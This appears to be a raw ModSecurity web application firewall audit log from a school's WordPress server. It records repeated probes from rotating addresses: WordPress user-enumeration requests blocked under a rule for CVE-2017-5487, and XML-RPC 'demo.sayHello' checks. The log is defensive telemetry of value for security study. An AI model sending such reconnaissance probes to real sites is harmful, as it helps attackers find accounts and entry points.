[line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495460768877 2752 (- - -) Stopwatch2: 1747495460768877 2752; combined=1258, p1=435, p2=795, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --507c9318-Z-- --7f09b16a-A-- [17/May/2025:22:24:27 +0700] aCiqKxKi5m5upc8uMd4QmAAAAMA 103.236.140.4 49618 103.236.140.4 8181 --7f09b16a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7f09b16a-C-- demo.sayHello --7f09b16a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f09b16a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495467843352 5927 (- - -) Stopwatch2: 1747495467843352 5927; combined=4402, p1=546, p2=3634, p3=31, p4=34, p5=93, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f09b16a-Z-- --3b3a1160-A-- [17/May/2025:22:25:26 +0700] aCiqZnyxdQCiyU1ENFecCAAAABg 103.236.140.4 50622 103.236.140.4 8181 --3b3a1160-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b3a1160-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b3a1160-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495526039754 2799 (- - -) Stopwatch2: 1747495526039754 2799; combined=1299, p1=408, p2=861, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b3a1160-Z-- --b0f72612-A-- [17/May/2025:22:25:32 +0700] aCiqbHyxdQCiyU1ENFecEgAAABU 103.236.140.4 50718 103.236.140.4 8181 --b0f72612-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0f72612-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f72612-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495532563815 2702 (- - -) Stopwatch2: 1747495532563815 2702; combined=1225, p1=428, p2=757, p3=0, p4=0, p5=39, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f72612-Z-- --db58023c-A-- [17/May/2025:22:25:34 +0700] aCiqbnyxdQCiyU1ENFecEwAAAAQ 103.236.140.4 50760 103.236.140.4 8181 --db58023c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --db58023c-C-- demo.sayHello --db58023c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --db58023c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495534977470 5775 (- - -) Stopwatch2: 1747495534977470 5775; combined=4238, p1=556, p2=3449, p3=33, p4=36, p5=97, sr=81, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db58023c-Z-- --79326401-A-- [17/May/2025:22:25:40 +0700] aCiqdBKi5m5upc8uMd4RHwAAAMc 103.236.140.4 50858 103.236.140.4 8181 --79326401-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79326401-C-- demo.sayHello --79326401-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79326401-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495540653136 5013 (- - -) Stopwatch2: 1747495540653136 5013; combined=3664, p1=472, p2=2974, p3=31, p4=32, p5=89, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79326401-Z-- --4dd0dc0b-A-- [17/May/2025:22:26:43 +0700] aCiqsxKi5m5upc8uMd4RQQAAANE 103.236.140.4 52070 103.236.140.4 8181 --4dd0dc0b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4dd0dc0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dd0dc0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495603243340 2311 (- - -) Stopwatch2: 1747495603243340 2311; combined=1007, p1=345, p2=638, p3=0, p4=0, p5=24, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dd0dc0b-Z-- --0b5a9b6d-A-- [17/May/2025:22:26:51 +0700] aCiquxKi5m5upc8uMd4RQgAAAMk 103.236.140.4 52222 103.236.140.4 8181 --0b5a9b6d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b5a9b6d-C-- demo.sayHello --0b5a9b6d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b5a9b6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495611611547 5638 (- - -) Stopwatch2: 1747495611611547 5638; combined=4190, p1=533, p2=3436, p3=31, p4=35, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b5a9b6d-Z-- --d0279f35-A-- [17/May/2025:22:27:31 +0700] aCiq4-m4kjNN-hEbWjKezwAAAFE 103.236.140.4 52962 103.236.140.4 8181 --d0279f35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d0279f35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0279f35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495651190270 2606 (- - -) Stopwatch2: 1747495651190270 2606; combined=1460, p1=461, p2=959, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0279f35-Z-- --abab9118-A-- [17/May/2025:22:27:40 +0700] aCiq7ATOsBn9MSWb6WLOawAAAJI 103.236.140.4 53106 103.236.140.4 8181 --abab9118-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abab9118-C-- demo.sayHello --abab9118-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abab9118-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495660332590 5191 (- - -) Stopwatch2: 1747495660332590 5191; combined=3777, p1=492, p2=3087, p3=36, p4=31, p5=78, sr=71, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abab9118-Z-- --68e92174-A-- [17/May/2025:22:28:36 +0700] aCirJBKi5m5upc8uMd4RuwAAANA 103.236.140.4 54136 103.236.140.4 8181 --68e92174-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68e92174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e92174-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495716034834 2233 (- - -) Stopwatch2: 1747495716034834 2233; combined=1144, p1=350, p2=764, p3=0, p4=0, p5=29, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e92174-Z-- --00e8f454-A-- [17/May/2025:22:28:45 +0700] aCirLQTOsBn9MSWb6WLPJAAAAIU 103.236.140.4 54350 103.236.140.4 8181 --00e8f454-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00e8f454-C-- demo.sayHello --00e8f454-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00e8f454-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495725565598 17028 (- - -) Stopwatch2: 1747495725565598 17028; combined=27856, p1=502, p2=3495, p3=34, p4=36, p5=11909, sr=71, sw=62, l=0, gc=11818 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00e8f454-Z-- --bede8c15-A-- [17/May/2025:22:29:39 +0700] aCirYxKi5m5upc8uMd4STwAAAM4 103.236.140.4 55416 103.236.140.4 8181 --bede8c15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bede8c15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bede8c15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495779747164 2796 (- - -) Stopwatch2: 1747495779747164 2796; combined=1206, p1=409, p2=768, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bede8c15-Z-- --b99a7d78-A-- [17/May/2025:22:29:49 +0700] aCirbRKi5m5upc8uMd4SaAAAANU 103.236.140.4 55590 103.236.140.4 8181 --b99a7d78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.181 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b99a7d78-C-- demo.sayHello --b99a7d78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b99a7d78-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495789103041 6203 (- - -) Stopwatch2: 1747495789103041 6203; combined=4807, p1=657, p2=3899, p3=38, p4=43, p5=101, sr=76, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b99a7d78-Z-- --db46975e-A-- [17/May/2025:22:30:37 +0700] aCirnQTOsBn9MSWb6WLPkQAAAJI 103.236.140.4 56518 103.236.140.4 8181 --db46975e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --db46975e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db46975e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495837221012 2831 (- - -) Stopwatch2: 1747495837221012 2831; combined=1271, p1=448, p2=793, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db46975e-Z-- --863d4420-A-- [17/May/2025:22:30:44 +0700] aCirpATOsBn9MSWb6WLPmgAAAJY 103.236.140.4 56626 103.236.140.4 8181 --863d4420-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --863d4420-C-- demo.sayHello --863d4420-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --863d4420-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495844879309 5700 (- - -) Stopwatch2: 1747495844879309 5700; combined=4174, p1=548, p2=3402, p3=35, p4=35, p5=92, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --863d4420-Z-- --63fda910-A-- [17/May/2025:22:30:56 +0700] aCirsBKi5m5upc8uMd4TVAAAAME 103.236.140.4 56850 103.236.140.4 8181 --63fda910-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63fda910-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63fda910-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495856500756 2479 (- - -) Stopwatch2: 1747495856500756 2479; combined=1295, p1=389, p2=877, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
